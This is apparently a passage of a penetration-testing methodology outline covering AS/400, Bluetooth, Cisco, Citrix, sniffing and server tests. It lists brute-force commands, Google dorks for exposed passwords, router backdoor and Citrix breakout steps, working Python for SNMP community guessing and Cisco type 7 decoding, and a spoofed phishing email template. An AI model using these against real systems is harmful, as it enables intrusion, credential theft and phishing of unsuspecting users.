20.3.5. NGS Squirrel for SQL

20.3.6. SARA

20.3.7. MatriXay

20.3.8. BiDiBlah

20.3.9. SSA

20.3.10. Oval Interpreter

20.3.11. Xscan

20.3.12. Security Manager +

20.3.13. Inguma

20.4. Resources

20.4.1. Security Focus

20.4.2. Microsoft Security Bulletin

20.4.3. Common Vulnerabilities and Exposures (CVE)

20.4.4. National Vulnerability Database (NVD)

20.4.5. The Open Source Vulnerability Database (OSVDB)

20.4.5.1. Standalone Database

20.4.5.1.1. Update URL

20.4.6. United States Computer Emergency Response Team (US-CERT)

20.4.7. Computer Emergency Response Team

20.4.8. Mozilla Security Information

20.4.9. SANS

20.4.10. Securiteam

20.4.11. PacketStorm Security

20.4.12. Security Tracker

20.4.13. Secunia

20.4.14. Vulnerabilities.org

20.4.15. ntbugtraq

20.4.16. Wireless Vulnerabilities and Exploits (WVE)

20.5. Blogs

20.5.1. Carnal0wnage

20.5.2. Fsecure Blog

20.5.3. g0ne blog

20.5.4. GNUCitizen

20.5.5. ha.ckers Blog

20.5.6. Jeremiah Grossman Blog

20.5.7. Metasploit

20.5.8. nCircle Blogs

20.5.9. pentest mokney.net

20.5.10. Rational Security

20.5.11. Rise Security

20.5.12. Security Fix Blog

20.5.13. Software Vulnerability Exploitation Blog

20.5.14. Taosecurity Blog

21. AS/400 Auditing

21.1. Remote

21.1.1. Information Gathering

21.1.1.1. Nmap using common iSeries (AS/400) services.

21.1.1.1.1. Unsecured services (Port;name;description)

21.1.1.1.2. Secured services (Port;name;description)

21.1.1.2. NetCat (old school technique)

21.1.1.2.1. for port in $(cat ListOfServices.txt); do nc -v -z -w 2 target $port; done 2>&1 | grep open

21.1.1.3. Banners Grabbing

21.1.1.3.1. Telnet

21.1.1.3.2. FTP

21.1.1.3.3. HTTP Banner

21.1.1.3.4. POP3

21.1.1.3.5. SNMP

21.1.1.3.6. SMTP

21.1.2. Users Enumeration

21.1.2.1. Default AS/400 users accounts

21.1.2.2. Error messages

21.1.2.2.1. Telnet Login errors

21.1.2.2.2. POP3 authentication Errors

21.1.2.3. Qsys symbolic link (if ftp is enabled)

21.1.2.3.1. ftp target, then at the ftp> prompt: quote stat, followed by quote site namefmt 1

21.1.2.3.2. cd /

21.1.2.3.3. quote site listfmt 1

21.1.2.3.4. mkdir temp

21.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

21.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

21.1.2.3.7. dir /temp/qsys/*.usrprf

21.1.2.4. LDAP

21.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

21.1.2.4.2. Tool to browse LDAP

21.1.3. Exploitation

21.1.3.1. CVE References

21.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

21.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

21.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

21.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

21.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

21.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

21.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

21.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

21.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

21.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

21.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

21.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

21.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

21.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

21.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

21.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

21.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

21.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

21.1.3.2. Access with Work Station Gateway

21.1.3.2.1. http://target:5061/WSG

21.1.3.2.2. Default AS/400 accounts.

21.1.3.3. Network attacks (next release)

21.1.3.3.1. DB2

21.1.3.3.2. QSHELL

21.1.3.3.3. Hijacking Terminals

21.1.3.3.4. Trojan attacks

21.1.3.3.5. Hacking from AS/400

21.2. Local

21.2.1. System Value Security

21.2.1.4. Untitled

21.2.1.4.1. Recommended value is 30

21.2.2. Password Policy

21.2.3. Audit level

21.2.3.1. Untitled

21.2.3.1.1. Recommended value is *SECURITY

21.2.4. Documentation

21.2.4.1. Users class

21.2.4.2. System Audit Settings

21.2.4.3. Special Authorities Definitions

22. Bluetooth Specific Testing

22.1. Bluescanner

22.2. Bluesweep

22.3. btscanner

22.4. Redfang

22.5. Blueprint

22.6. Bluesnarfer

22.7. Bluebugger

22.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

22.8. Blueserial

22.9. Bloover

22.10. Bluesniff

22.11. Exploit Frameworks

22.11.1. BlueMaho

22.12. Resources

22.12.1. URL's

22.12.1.1. BlueStumbler.org

22.12.1.2. Bluejackq.com

22.12.1.3. Bluejacking.com

22.12.1.4. Bluejackers

22.12.1.5. bluetooth-pentest

22.12.1.6. ibluejackedyou.com

22.12.1.7. Trifinite

22.12.2. Vulnerability Information

22.12.2.1. Common Vulnerabilities and Exposures (CVE)

22.12.2.1.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

22.12.3. White Papers

22.12.3.1. Bluesnarfing

23. Cisco Specific Testing

23.1. Methodology

23.1.1. Scan & Fingerprint.

23.1.1.3. If SNMP is active, then community string guessing should be performed.

23.1.2. Credentials Guessing.

23.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

23.1.3. Connect

23.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

23.1.4. Check for bugs

23.1.4.1. Untitled

23.1.4.1.1. The most widely known/ used are: Nessus, Retina, GFI LanGuard and Core Impact.

23.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

23.1.5. Further your attack

23.1.5.1. Untitled

23.1.5.1.1. running-config is the configuration currently in effect. It is loaded from the startup-config at boot, is editable, and changes take effect immediately but are lost when the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.

23.1.5.1.2. startup-config is the boot-up configuration file, stored in NVRAM. It is this file that needs altering to maintain a permanent connection through to the internal network.

23.1.5.2. Untitled

23.1.5.2.1. #> access-list 100 permit ip <IP> any

23.2. Scan & Fingerprint.

23.2.1. Port Scanning

23.2.1.1. nmap

23.2.1.2. Other tools

23.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

23.2.2. Fingerprinting

23.2.2.1. Untitled

23.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

23.2.2.2. Untitled

23.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

23.3. Password Guessing.

23.3.1. Untitled

23.3.1.1. ./CAT -h <IP> -a password.wordlist

23.3.2. Untitled

23.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

23.3.3. Untitled

23.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco

23.4. SNMP Attacks.

23.4.1. Untitled

23.4.1.1. ./CAT -h <IP> -w SNMP.wordlist

23.4.2. Untitled

23.4.2.1. onesixtyone -c SNMP.wordlist <IP>

23.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

23.4.3. Untitled

23.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>
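
What onesixtyone and CAT do on the wire during community string guessing, as an added example (not part of the original page or of either tool): build an SNMPv1 GetRequest for sysDescr.0 with each candidate community and treat any GetResponse as a hit, since a v1/v2c agent simply drops requests carrying a wrong community. The BER encoding is done by hand so the packet is visible; build_response exists only so the parser can be exercised offline, and the target, wordlist and sample values are constructed.

```python
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"

def _tlv(tag, payload):
    """BER tag-length-value with short or long-form length."""
    n = len(payload)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + payload

def _int(n):
    """INTEGER in minimal-length two's complement, as BER requires."""
    size = 1
    while not -(1 << (8 * size - 1)) <= n < (1 << (8 * size - 1)):
        size += 1
    return _tlv(0x02, n.to_bytes(size, "big", signed=True))

def _oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return _tlv(0x06, bytes(out))

def build_get(community, oid=SYS_DESCR, request_id=1):
    """SNMPv1 GetRequest: the packet a community brute-forcer sends once per candidate."""
    varbind = _tlv(0x30, _oid(oid) + _tlv(0x05, b""))                  # OID + NULL
    pdu = _tlv(0xA0, _int(request_id) + _int(0) + _int(0) + _tlv(0x30, varbind))
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)  # version 0 = SNMPv1

def build_response(community, value, request_id=1, oid=SYS_DESCR):
    """GetResponse as an agent would send it; used here only to construct sample traffic."""
    varbind = _tlv(0x30, _oid(oid) + _tlv(0x04, value.encode()))
    pdu = _tlv(0xA2, _int(request_id) + _int(0) + _int(0) + _tlv(0x30, varbind))
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)

def _read_tlv(buf, pos=0):
    """Return (tag, payload, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def parse_response(pkt):
    """(community, sysDescr) from a GetResponse, or None if it is not a clean response."""
    tag, msg, _ = _read_tlv(pkt)
    if tag != 0x30:
        return None
    _, _, p = _read_tlv(msg)                 # version
    _, community, p = _read_tlv(msg, p)      # community echoed back by the agent
    ptag, pdu, _ = _read_tlv(msg, p)
    if ptag != 0xA2:                         # 0xA2 = GetResponse
        return None
    _, _, p = _read_tlv(pdu)                 # request-id
    _, err, p = _read_tlv(pdu, p)            # error-status; non-zero = valid community, bad OID
    if err != b"\x00":
        return None
    _, _, p = _read_tlv(pdu, p)              # error-index
    _, varbinds, _ = _read_tlv(pdu, p)
    _, vb, _ = _read_tlv(varbinds)
    _, _, q = _read_tlv(vb)                  # OID
    vtag, value, _ = _read_tlv(vb, q)
    return community.decode(), (value.decode(errors="replace") if vtag == 0x04 else value.hex())

def guess_communities(target, wordlist, timeout=0.5):
    """Try each community against UDP/161; silence means wrong community (or filtered)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    hits = []
    for i, community in enumerate(wordlist, 1):
        sock.sendto(build_get(community, request_id=i), (target, 161))
        try:
            data, _ = sock.recvfrom(4096)
        except socket.timeout:
            continue
        parsed = parse_response(data)
        if parsed:
            hits.append(parsed)
    sock.close()
    return hits

if __name__ == "__main__":
    print(guess_communities("192.0.2.1", ["public", "private", "cisco", "enable"]))
```

A hit on a read-only community already gives the IOS version for the bug check above; a read-write one is what turns SNMP into a path to the configuration files and hence the enable password. Note that the silence-on-failure behaviour means a filtered port and a wrong community look identical, so confirm UDP/161 is reachable (e.g. with the Nmap scan above) before trusting an empty result.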

23.5. Connecting.

23.5.1. Telnet

23.5.1.1. Untitled

23.5.1.1.1. telnet <IP>

23.5.1.1.2. Sample Banners

23.5.2. SSH

23.5.3. Web Browser

23.5.3.1. Untitled

23.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

23.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:

23.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

23.5.4. TFTP

23.5.4.1. Untitled

23.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

23.5.4.2. Untitled

23.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

23.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

23.5.4.2.3. Creating backdoors in Cisco IOS using TCL

23.6. Known Bugs.

23.6.1. Attack Tools

23.6.1.2. Untitled

23.6.1.2.1. Web browse to the Cisco device: http://<IP>

23.6.1.3. Untitled

23.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

23.6.2. Common Vulnerabilities and Exposures (CVE) Information

23.6.2.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

23.7. Configuration Files.

23.7.1. Untitled

23.7.1.1. Configuration files explained

23.7.1.1.1. The line that reads "enable password router", where "router" is the password, sets the legacy enable password, stored in cleartext or (with "service password-encryption") as a reversible type 7 string. When an "enable secret" line is also present, the secret (a one-way hash, type 5 MD5-crypt on older IOS) takes precedence and the enable password is ignored.

23.7.1.1.4. Password Encryption Utilised
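
Added example for the password storage types found in these files (not the page's own code): type 7 strings are decoded in place, enable secrets are flagged for offline cracking, and plaintext username, line and SNMP community values are reported as such. SAMPLE_CONFIG is a constructed excerpt; the enable secret in it is a placeholder, not a real hash. The three type 7 strings all decode to "cisco".

```python
# Cisco type 7 is reversible obfuscation, not encryption: the first two digits of the
# string index into this fixed key, and each following byte pair is the plaintext
# character XORed with the key byte at that (advancing) index.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

def type7_decrypt(encoded):
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data)).decode()

def type7_encrypt(plaintext, seed=9):
    """Inverse of the above; IOS itself picks a seed between 0 and 15."""
    body = bytes(ord(c) ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, c in enumerate(plaintext))
    return f"{seed:02d}{body.hex().upper()}"

def _reveal(fields):
    """fields is whatever follows the 'password' keyword: '<pw>', '0 <pw>' or '7 <hex>'."""
    if fields[0] == "7":
        return "type 7 (decoded)", type7_decrypt(fields[1])
    if fields[0] == "0":
        return "plaintext", fields[1]
    return "plaintext", fields[0]

def audit_config(config_text):
    """Classify every credential in a running-config as (where, how stored, value)."""
    findings = []
    for line in config_text.splitlines():
        t = line.split()
        if len(t) < 3:
            continue
        if t[0] == "enable" and t[1] == "secret":
            # type 5 (MD5-crypt), 8 (PBKDF2) and 9 (scrypt) are one-way: crack offline with John
            findings.append(("enable secret", "one-way hash, crack offline", t[-1]))
        elif t[0] == "enable" and t[1] == "password":
            findings.append(("enable password", *_reveal(t[2:])))
        elif t[0] == "username" and "password" in t:
            findings.append((f"user {t[1]}", *_reveal(t[t.index("password") + 1:])))
        elif t[0] == "password":                      # under 'line con/vty': login password
            findings.append(("line password", *_reveal(t[1:])))
        elif t[0] == "snmp-server" and t[1] == "community":
            access = t[3] if len(t) > 3 else "RO"
            findings.append((f"snmp community ({access})", "plaintext", t[2]))
    return findings

# Constructed running-config excerpt; the secret hash is a placeholder, not a real digest.
SAMPLE_CONFIG = """\
hostname edge-rtr
enable secret 5 $1$abcd$placeholderplaceholderp
enable password 7 094F471A1A0A
username admin privilege 15 password 7 0822455D0A16
username backup password cisco123
snmp-server community public RO
snmp-server community private RW
line vty 0 4
 password 7 1511021F0725
 login
"""

if __name__ == "__main__":
    for where, how, value in audit_config(SAMPLE_CONFIG):
        print(f"{where:24} {how:28} {value}")
```

The practical consequence for the methodology above: any type 7 value recovered from a config obtained via SNMP or TFTP is an immediate credential, while an enable secret only gives a hash to feed to John the Ripper, so check for an "enable password" line before spending time on the secret.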

23.7.1.2. Configuration Testing Tools

23.7.1.2.1. Nipper

23.7.1.2.2. fwauto (Beta)

23.8. References.

23.8.1. Cisco IOS Exploitation Techniques

24. Citrix Specific Testing

24.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information has been put together to help you conduct a vulnerability assessment/ penetration test against Citrix.

24.2. Enumeration

24.2.1. web search

24.2.1.1. Google (GHDB)

24.2.1.1.1. ext:ica

24.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

24.2.1.1.3. [WFClient] Password= filetype:ica

24.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

24.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

24.2.1.1.6. inurl:/Citrix/Nfuse17/

24.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

24.2.1.2. Google Hacks (Author Discovered)

24.2.1.2.1. filetype:ica Username=

24.2.1.2.2. inurl:/Citrix/AccessPlatform/

24.2.1.2.3. inurl:LogonAgent/Login.asp

24.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp

24.2.1.2.5. inurl:/Citrix/NFuse161/login.asp

24.2.1.2.6. inurl:/Citrix/NFuse16

24.2.1.2.7. inurl:/Citrix/NFuse151/

24.2.1.2.8. allintitle:MetaFrame XP Login

24.2.1.2.9. allintitle:MetaFrame Presentation Server Login

24.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

24.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login

24.2.1.3. Yahoo

24.2.1.3.1. originurlextension:ica

24.2.2. site search

24.2.2.1. Manual

24.2.2.1.1. review web page for useful information

24.2.2.1.2. review source for web page

24.2.3. generic

24.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

24.2.3.2. amap -bqv ip_address port_no.

24.2.4. citrix specific

24.2.4.1. enum.pl

24.2.4.1.1. perl enum.pl ip_address

24.2.4.2. enum.js

24.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address

24.2.4.3. connect.js

24.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application

24.2.4.4. Citrix-pa-scan

24.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

24.2.4.5. pabrute.c

24.2.4.5.1. ./pabrute pubapp list app_list ip_address

24.2.5. Default Ports

24.2.5.1. TCP

24.2.5.1.1. Citrix XML Service

24.2.5.1.2. Advanced Management Console

24.2.5.1.3. Citrix SSL Relay

24.2.5.1.4. ICA sessions

24.2.5.1.5. Server to server

24.2.5.1.6. Management Console to server

24.2.5.1.7. Session Reliability (Auto-reconnect)

24.2.5.1.8. License Management Console

24.2.5.1.9. License server

24.2.5.2. UDP

24.2.5.2.1. Clients to ICA browser service

24.2.5.2.2. Server-to-server

24.2.6. nmap nse scripts

24.2.6.1. citrix-enum-apps

24.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

24.2.6.2. citrix-enum-apps-xml

24.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

24.2.6.3. citrix-enum-servers

24.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604 <host>

24.2.6.4. citrix-enum-servers-xml

24.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

24.2.6.5. citrix-brute-xml

24.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

24.3. Scanning

24.3.1. Nessus

24.3.1.1. Plugins

24.3.1.1.1. CGI abuses

24.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

24.3.1.1.3. Misc.

24.3.1.1.4. Service Detection

24.3.1.1.5. Web Servers

24.3.1.1.6. Windows

24.3.2. Nikto

24.3.2.1. perl nikto.pl -host ip_address -port port_no.

24.4. Exploitation

24.4.1. Alter default .ica files

24.4.1.1. InitialProgram=cmd.exe

24.4.1.2. InitialProgram=explorer.exe

24.4.2. Enumerate and Connect

24.4.2.1. For applications identified by Citrix-pa-scan

24.4.2.1.1. Pas

24.4.2.2. For published applications with a Citrix client when the master browser is non-public.

24.4.2.2.1. Citrix-pa-proxy

24.5. Brute Force

24.5.1. bforce.js

24.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

24.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

24.6. Review Configuration Files

24.6.1. Application server configuration file

24.6.1.1. appsrv.ini

24.6.1.1.1. Location

24.6.1.1.2. World writeable

24.6.1.1.3. Review other files

24.6.1.1.4. Sample file

24.6.2. Program Neighborhood configuration file

24.6.2.1. pn.ini

24.6.2.1.1. Location

24.6.2.1.2. Review other files

24.6.2.1.3. Sample file

24.6.3. Citrix ICA client configuration file

24.6.3.1. wfclient.ini

24.6.3.1.1. Location

24.7. References

24.7.1. Vulnerabilities

24.7.1.1. Art of Hacking

24.7.1.2. Common Vulnerabilities and Exploits (CVE)

24.7.1.2.1. Sample file

24.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

24.7.1.3. OSVDB

24.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search

24.7.1.4. Secunia

24.7.1.5. Security-database.com

24.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

24.7.1.6. SecurityFocus

24.7.2. Support

24.7.2.1. Citrix

24.7.2.1.1. Knowledge Base

24.7.2.2. Thinworld

24.7.3. Exploits

24.7.3.1. Milw0rm

24.7.3.1.1. http://www.milw0rm.com/search.php

24.7.3.2. Art of Hacking

24.7.3.2.1. Citrix

24.7.4. Tools Resource

24.7.4.1. Zip file containing the majority of the tools mentioned in this article, for easy download/access

25. Network Backbone

25.1. Generic Toolset

25.1.1. Wireshark (Formerly Ethereal)

25.1.1.1. Passive Sniffing

25.1.1.1.1. Usernames/Passwords

25.1.1.1.2. Email

25.1.1.1.3. FTP

25.1.1.1.4. HTTP

25.1.1.1.5. HTTPS

25.1.1.1.6. RDP

25.1.1.1.7. VOIP

25.1.1.1.8. Other

25.1.1.2. Filters

25.1.1.2.1. ip.src == ip_address

25.1.1.2.2. ip.dst == ip_address

25.1.1.2.3. tcp.dstport == port_no.

25.1.1.2.4. ! ip.addr == ip_address

25.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

25.1.2. Cain & Abel

25.1.2.1. Active Sniffing

25.1.2.1.1. ARP Cache Poisoning

25.1.2.1.2. DNS Poisoning

25.1.2.1.3. Routing Protocols

25.1.3. Cisco-Torch

25.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

25.1.4. NTP-Fingerprint

25.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

25.1.5. Yersinia

25.1.6. p0f

25.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

25.1.7. Manual Check (Credentials required)

25.1.8. MAC Spoofing

25.1.8.1. MAC address changer for Windows

25.1.8.2. macchanger

25.1.8.2.1. Random MAC address: macchanger -r eth0

25.1.8.3. madmacs

25.1.8.4. smac

25.1.8.5. TMAC

26. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or through various engines that are, at their most basic level, pre-compiled point-and-shoot tools. These engines also have a number of extra underlying features for more advanced users.

26.1. Password Attacks

26.1.1. Known Accounts

26.1.1.1. Identified Passwords

26.1.1.2. Unidentified Hashes

26.1.2. Default Accounts

26.1.2.1. Identified Passwords

26.1.2.2. Unidentified Hashes

26.2. Exploits

26.2.1. Successful Exploits

26.2.1.1. Accounts

26.2.1.1.1. Passwords

26.2.1.1.2. Groups

26.2.1.1.3. Other Details

26.2.1.2. Services

26.2.1.3. Backdoor

26.2.1.4. Connectivity

26.2.2. Unsuccessful Exploits

26.2.3. Resources

26.2.3.1. Securiteam

26.2.3.1.1. Exploits are sorted by year and must be downloaded individually

26.2.3.2. SecurityForest

26.2.3.2.1. Updated via CVS after initial install

26.2.3.3. GovernmentSecurity

26.2.3.3.1. Need to create an account to obtain access

26.2.3.4. Red Base Security

26.2.3.4.1. Oracle Exploit site only

26.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

26.2.3.5.1. Wireless Exploit Site

26.2.3.6. PacketStorm Security

26.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

26.2.3.7. SecWatch

26.2.3.7.1. Exploits sorted by year and month, download separately

26.2.3.8. SecurityFocus

26.2.3.8.1. Exploits must be downloaded individually

26.2.3.9. Metasploit

26.2.3.9.1. Install and regularly update via svn

26.2.3.10. Milw0rm

26.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!

26.3. Tools

26.3.1. Metasploit

26.3.1.1. Free Extra Modules

26.3.1.1.1. local copy

26.3.2. Manual SQL Injection

26.3.2.1. Understanding SQL Injection

26.3.2.2. SQL Injection walkthrough

26.3.2.3. SQL Injection by example

26.3.2.4. Blind SQL Injection

26.3.2.5. Advanced SQL Injection in SQL Server

26.3.2.6. More Advanced SQL Injection

26.3.2.7. Advanced SQL Injection in Oracle databases

26.3.2.8. SQL Cheatsheets

26.3.3. SQL Power Injector

26.3.4. SecurityForest

26.3.5. SPI Dynamics WebInspect

26.3.6. Core Impact

26.3.7. Cisco Global Exploiter

26.3.8. PIXDos

26.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]

26.3.9. CANVAS

26.3.10. Inguma

27. Server Specific Tests

27.1. Databases

27.1.1. Direct Access Interrogation

27.1.1.1. MS SQL Server

27.1.1.1.1. Ports

27.1.1.1.2. Version

27.1.1.1.3. osql

27.1.1.2. Oracle

27.1.1.2.1. Ports

27.1.1.2.2. TNS Listener

27.1.1.2.3. SQL Plus

27.1.1.2.4. Default Account/Passwords

27.1.1.2.5. Default SIDs

27.1.1.3. MySQL

27.1.1.3.1. Ports

27.1.1.3.2. Version

27.1.1.3.3. Users/Passwords

27.1.1.4. DB2

27.1.1.5. Informix

27.1.1.6. Sybase

27.1.1.7. Other

27.1.2. Scans

27.1.2.1. Default Ports

27.1.2.2. Non-Default Ports

27.1.2.3. Instance Names

27.1.2.4. Versions

27.1.3. Password Attacks

27.1.3.1. Sniffed Passwords

27.1.3.1.1. Cracked Passwords

27.1.3.1.2. Hashes

27.1.3.2. Direct Access Guesses

27.1.4. Vulnerability Assessment

27.1.4.1. Automated

27.1.4.1.1. Reports

27.1.4.1.2. Vulnerabilities

27.1.4.2. Manual

27.1.4.2.1. Patch Levels

27.1.4.2.2. Confirmed Vulnerabilities

27.2. Mail

27.2.1. Scans

27.2.2. Fingerprint

27.2.2.1. Manual

27.2.2.2. Automated

27.2.3. Spoofable

27.2.3.1. Telnet spoof

27.2.3.1.1. telnet target_IP 25
helo target.com
mail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]
X-Originating-Email: [[email protected]]
MIME-Version: 1.0
To: <[email protected]>
From: < [email protected] >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit

Dear Valued Customer,
The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.
Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>
Online Security Manager.
Target [email protected].

27.2.4. Relays

27.3. VPN

27.3.1. Scanning

27.3.1.1. 500 UDP IPSEC

27.3.1.2. 1723 TCP PPTP

27.3.1.3. 443 TCP/SSL

27.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

27.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

27.3.2. Fingerprinting

27.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

27.3.3. PSK Crack

27.3.3.1. ikeprobe 80.75.68.27

27.3.3.2. sniff for responses with C&A or ikecrack

27.4. Web

27.4.1. Vulnerability Assessment

27.4.1.1. Automated

27.4.1.1.1. Reports

27.4.1.1.2. Vulnerabilities

27.4.1.2. Manual

27.4.1.2.1. Patch Levels

27.4.1.2.2. Confirmed Vulnerabilities

27.4.2. Permissions

27.4.2.1. PUT /test.txt HTTP/1.0

27.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

27.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
